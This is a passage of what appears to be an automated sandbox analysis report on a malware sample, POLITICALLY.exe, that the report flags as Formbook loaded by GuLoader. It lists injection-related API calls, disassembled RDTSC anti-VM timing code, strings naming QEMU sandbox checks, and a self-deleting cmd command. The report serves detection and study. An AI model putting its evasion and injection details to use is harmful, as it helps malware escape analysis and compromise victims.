Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_1E279660
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_1E2796E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279710 NtQueryInformationToken,LdrInitializeThunk, 10_2_1E279710
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_1E2797A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279780 NtMapViewOfSection,LdrInitializeThunk, 10_2_1E279780
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279FE0 NtCreateMutant,LdrInitializeThunk, 10_2_1E279FE0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279540 NtReadFile,LdrInitializeThunk, 10_2_1E279540
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2795D0 NtClose,LdrInitializeThunk, 10_2_1E2795D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A20 NtResumeThread,LdrInitializeThunk, 10_2_1E279A20
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk, 10_2_1E279A00
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A50 NtCreateFile,LdrInitializeThunk, 10_2_1E279A50
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk, 10_2_1E279860
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279840 NtDelayExecution,LdrInitializeThunk, 10_2_1E279840
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk, 10_2_1E2798F0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_1E279910
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2799A0 NtCreateSection,LdrInitializeThunk, 10_2_1E2799A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279610 NtEnumerateValueKey, 10_2_1E279610
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279670 NtQueryInformationProcess, 10_2_1E279670
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279650 NtQueryValueKey, 10_2_1E279650
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2796D0 NtCreateKey, 10_2_1E2796D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279730 NtQueryVirtualMemory, 10_2_1E279730
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27A710 NtOpenProcessToken, 10_2_1E27A710
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279760 NtOpenProcess, 10_2_1E279760
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27A770 NtOpenThread, 10_2_1E27A770
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279770 NtSetInformationFile, 10_2_1E279770
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279520 NtWaitForSingleObject, 10_2_1E279520
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27AD30 NtSetContextThread, 10_2_1E27AD30
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279560 NtWriteFile, 10_2_1E279560
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2795F0 NtQueryInformationFile, 10_2_1E2795F0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A10 NtQuerySection, 10_2_1E279A10
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A80 NtOpenDirectoryObject, 10_2_1E279A80
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279B00 NtSetValueKey, 10_2_1E279B00
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27A3B0 NtGetContextThread, 10_2_1E27A3B0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279820 NtEnumerateKey, 10_2_1E279820
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27B040 NtSuspendThread, 10_2_1E27B040
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2798A0 NtWriteVirtualMemory, 10_2_1E2798A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279950 NtQueueApcThread, 10_2_1E279950
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2799D0 NtCreateProcessEx, 10_2_1E2799D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048695D0 NtClose,LdrInitializeThunk, 23_2_048695D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869540 NtReadFile,LdrInitializeThunk, 23_2_04869540
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048696D0 NtCreateKey,LdrInitializeThunk, 23_2_048696D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk, 23_2_048696E0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869650 NtQueryValueKey,LdrInitializeThunk, 23_2_04869650
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk, 23_2_04869660
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869780 NtMapViewOfSection,LdrInitializeThunk, 23_2_04869780
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869FE0 NtCreateMutant,LdrInitializeThunk, 23_2_04869FE0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869710 NtQueryInformationToken,LdrInitializeThunk, 23_2_04869710
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869840 NtDelayExecution,LdrInitializeThunk, 23_2_04869840
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869860 NtQuerySystemInformation,LdrInitializeThunk, 23_2_04869860
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048699A0 NtCreateSection,LdrInitializeThunk, 23_2_048699A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk, 23_2_04869910
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A50 NtCreateFile,LdrInitializeThunk, 23_2_04869A50
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048695F0 NtQueryInformationFile, 23_2_048695F0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869520 NtWaitForSingleObject, 23_2_04869520
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486AD30 NtSetContextThread, 23_2_0486AD30
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869560 NtWriteFile, 23_2_04869560
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869610 NtEnumerateValueKey, 23_2_04869610
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869670 NtQueryInformationProcess, 23_2_04869670
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048697A0 NtUnmapViewOfSection, 23_2_048697A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486A710 NtOpenProcessToken, 23_2_0486A710
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869730 NtQueryVirtualMemory, 23_2_04869730
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869760 NtOpenProcess, 23_2_04869760
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486A770 NtOpenThread, 23_2_0486A770
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869770 NtSetInformationFile, 23_2_04869770
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048698A0 NtWriteVirtualMemory, 23_2_048698A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048698F0 NtReadVirtualMemory, 23_2_048698F0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869820 NtEnumerateKey, 23_2_04869820
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486B040 NtSuspendThread, 23_2_0486B040
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048699D0 NtCreateProcessEx, 23_2_048699D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869950 NtQueueApcThread, 23_2_04869950
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A80 NtOpenDirectoryObject, 23_2_04869A80
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A00 NtProtectVirtualMemory, 23_2_04869A00
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A10 NtQuerySection, 23_2_04869A10
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A20 NtResumeThread, 23_2_04869A20
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486A3B0 NtGetContextThread, 23_2_0486A3B0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869B00 NtSetValueKey, 23_2_04869B00
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B83A0 NtAllocateVirtualMemory, 23_2_030B83A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B8270 NtReadFile, 23_2_030B8270
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B82F0 NtClose, 23_2_030B82F0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B81C0 NtCreateFile, 23_2_030B81C0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B839A NtAllocateVirtualMemory, 23_2_030B839A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B826A NtReadFile, 23_2_030B826A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B82EA NtClose, 23_2_030B82EA
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B81BA NtCreateFile, 23_2_030B81BA
Detected potential crypto function
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_00404CFF 2_2_00404CFF
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E256E30 10_2_1E256E30
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FD616 10_2_1E2FD616
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E302EF7 10_2_1E302EF7
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E301FF1 10_2_1E301FF1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30DFCE 10_2_1E30DFCE
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24841F 10_2_1E24841F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FD466 10_2_1E2FD466
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E230D20 10_2_1E230D20
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E302D07 10_2_1E302D07
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E301D55 10_2_1E301D55
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24D5E0 10_2_1E24D5E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3025DD 10_2_1E3025DD
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3022AE 10_2_1E3022AE
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E302B28 10_2_1E302B28
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26EBB0 10_2_1E26EBB0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F03DA 10_2_1E2F03DA
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FDBD2 10_2_1E2FDBD2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30E824 10_2_1E30E824
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1002 10_2_1E2F1002
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3020A8 10_2_1E3020A8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B090 10_2_1E24B090
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3028EC 10_2_1E3028EC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23F900 10_2_1E23F900
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483841F 23_2_0483841F
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048ED466 23_2_048ED466
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 23_2_04852581
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F25DD 23_2_048F25DD
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483D5E0 23_2_0483D5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F2D07 23_2_048F2D07
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04820D20 23_2_04820D20
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F1D55 23_2_048F1D55
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F2EF7 23_2_048F2EF7
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048ED616 23_2_048ED616
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04846E30 23_2_04846E30
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048FDFCE 23_2_048FDFCE
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F1FF1 23_2_048F1FF1
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B090 23_2_0483B090
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F20A8 23_2_048F20A8
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F28EC 23_2_048F28EC
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1002 23_2_048E1002
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048FE824 23_2_048FE824
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482F900 23_2_0482F900
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 23_2_04844120
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F22AE 23_2_048F22AE
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485EBB0 23_2_0485EBB0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E03DA 23_2_048E03DA
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EDBD2 23_2_048EDBD2
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F2B28 23_2_048F2B28
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BCB24 23_2_030BCB24
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A2FB0 23_2_030A2FB0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BC6F5 23_2_030BC6F5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BC50F 23_2_030BC50F
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A2D8A 23_2_030A2D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A2D90 23_2_030A2D90
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A8C5E 23_2_030A8C5E
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A8C60 23_2_030A8C60
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB4A6 23_2_030BB4A6
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: String function: 1E23B150 appears 45 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0482B150 appears 35 times
PE file contains strange resources
Source: POLITICALLY.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: POLITICALLY.exe, 00000002.00000002.415420522.0000000002200000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs POLITICALLY.exe
Source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs POLITICALLY.exe
Source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs POLITICALLY.exe
Source: POLITICALLY.exe, 0000000A.00000002.548056458.0000000002420000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs POLITICALLY.exe
Uses 32bit PE files
Source: POLITICALLY.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@7/0@0/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01
Source: POLITICALLY.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\POLITICALLY.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: POLITICALLY.exe Virustotal: Detection: 17%
Source: POLITICALLY.exe ReversingLabs: Detection: 17%
Source: unknown Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Users\user\Desktop\POLITICALLY.exe Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\POLITICALLY.exe Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe' Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: POLITICALLY.exe, control.exe
Source: Binary string: control.pdbUGP source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_00416E20 push ebx; iretd 2_2_00416E21
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_00403225 pushfd ; iretd 2_2_00403226
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DC36 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E245 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E378 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E736 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DB19 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02221E17 push ds; iretd 2_2_02221D92
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DFD8 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DD81 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02221DD8 push ds; iretd 2_2_02221D92
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E28D0D1 push ecx; ret 10_2_1E28D0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0487D0D1 push ecx; ret 23_2_0487D0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB3B5 push eax; ret 23_2_030BB408
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B8F44 push es; ret 23_2_030B8F45
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB40B push eax; ret 23_2_030BB472
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB402 push eax; ret 23_2_030BB408
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB46C push eax; ret 23_2_030BB472
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030AB48A push edx; ret 23_2_030AB48B
Source: C:\Users\user\Desktop\POLITICALLY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000016 jmp 00007FDAB4B9AB29h 0x0000001b test ecx, 375658D5h 0x00000021 call 00007FDAB4B9AC71h 0x00000026 call 00007FDAB4B9AA18h 0x0000002b lfence 0x0000002e mov edx, dword ptr [7FFE0014h] 0x00000034 lfence 0x00000037 ret 0x00000038 mov esi, edx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDAB47B2AF8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f jmp 00007FDAB47B2C0Dh 0x00000024 cmp eax, eax 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007FDAB47B29BDh 0x00000039 call 00007FDAB47B2D61h 0x0000003e call 00007FDAB47B2B08h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc
Tries to detect Any.run
Source: C:\Users\user\Desktop\POLITICALLY.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
